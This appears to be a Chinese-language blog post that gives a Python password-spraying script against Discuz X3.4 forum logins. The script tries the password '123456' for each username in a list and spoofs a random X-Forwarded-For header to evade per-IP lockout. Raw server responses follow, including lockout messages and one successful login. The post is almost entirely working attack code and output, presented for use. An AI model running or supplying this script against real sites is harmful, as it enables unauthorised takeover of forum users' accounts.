2020-11-02 | Python | UNLOCK

Discuz 无验证码爆破用户

Disucz X3.4

Fuzz.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import random
import requests

def rrrr():
s = "".join([x for x in range(3) for x in random.choice("1234567890")])
x = "{}.{}.{}.{}".format(s,s,s,s)
return x
def headers():
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"x-forwarded-for":rrrr()
}
return headers

x = open("user.txt",'r',encoding='utf-8').readlines()
for x in x:
x = x.strip()
data = "formhash=f41af98&referer=http%3A%2F%2Ftarget.com%2Fhome.php%3Fmod%3Dspacecp%26ac%3Davatar&loginfield=username&username={}&password={}&questionid=0&answer=".format(x,"123456")
r = requests.post("http://target/member.php?mod=logging&action=login&loginsubmit=yes&handlekey=login&loginhash=La6y6&inajax=1",data=data.encode("utf-8").decode("latin1"),headers=headers(),timeout=None)
print(r.text)
with open("result.txt",'a+',encoding='utf-8') as f:
f.write(r.text)

result

1
2
3
4
5
6
7
8
9
10
11
<root><![CDATA[密码错误次数过多,请 15 分钟后重新登录<script type="text/javascript" reload="1">if(typeof errorhandle_login=='function') {errorhandle_login('密码错误次数过多,请 15 分钟后重新登录', {});}</script>]]></root><?xml version="1.0" encoding="gbk"?>

<root><![CDATA[<script type="text/javascript" reload="1">if(typeof succeedhandle_login=='function') {succeedhandle_login('home.php?mod=spacecp&ac=profile&op=password', '您的账户存在安全隐患,建议立即修改密码', {'username':'tvftdrljw','usergroup':'<font color=\"#000000\">一钻用户</font>','uid':'2','groupid':'10','syn':'1'});}hideWindow('login');showDialog('您的账户存在安全隐患,建议立即修改密码', 'notice', null, function () { window.location.href ='home.php?mod=spacecp&ac=profile&op=password'; }, 0, null, null, null, null, null, 2);</script><script type="text/javascript" src="localhost/api/uc.php?time=1603975193&code=09e9Gvf4YnUq9FDf%2BVhi0lGMsP280jvpMMJ4cxqDhHVdk5iO8u2BPTZ6QSzXP1%2Bd8KKm51mhYQ7sGGWXn3Pgv%2B%2BpHaEd1CRIuZgDC%2FdQQQMJlSmYRQ0xfdIzY8ifnBeBEs%2FGdAuDtI26Dq3iD7py2Pfy5qFYH7FQ2cAVS00KRg" reload="1"></script>]]></root><?xml version="1.0" encoding="gbk"?>

<root><![CDATA[登录失败,您还可以尝试 3 次<script type="text/javascript" reload="1">if(typeof errorhandle_login=='function') {errorhandle_login('登录失败,您还可以尝试 3 次', {'loginperm':'3'});}</script>]]></root><?xml version="1.0" encoding="gbk"?>

<root><![CDATA[密码错误次数过多,请 15 分钟后重新登录<script type="text/javascript" reload="1">if(typeof errorhandle_login=='function') {errorhandle_login('密码错误次数过多,请 15 分钟后重新登录', {});}</script>]]></root><?xml version="1.0" encoding="gbk"?>

<root><![CDATA[登录失败,您还可以尝试 4 次<script type="text/javascript" reload="1">if(typeof errorhandle_login=='function') {errorhandle_login('登录失败,您还可以尝试 4 次', {'loginperm':'4'});}</script>]]></root><?xml version="1.0" encoding="gbk"?>

<root><![CDATA[登录失败,您还可以尝试 4 次<script type="text/javascript" reload="1">if(typeof errorhandle_login=='function') {errorhandle_login('登录失败,您还可以尝试 4 次', {'loginperm':'4'});}</script>]]></root><?xml version="1.0" encoding="gbk"?>

评论加载中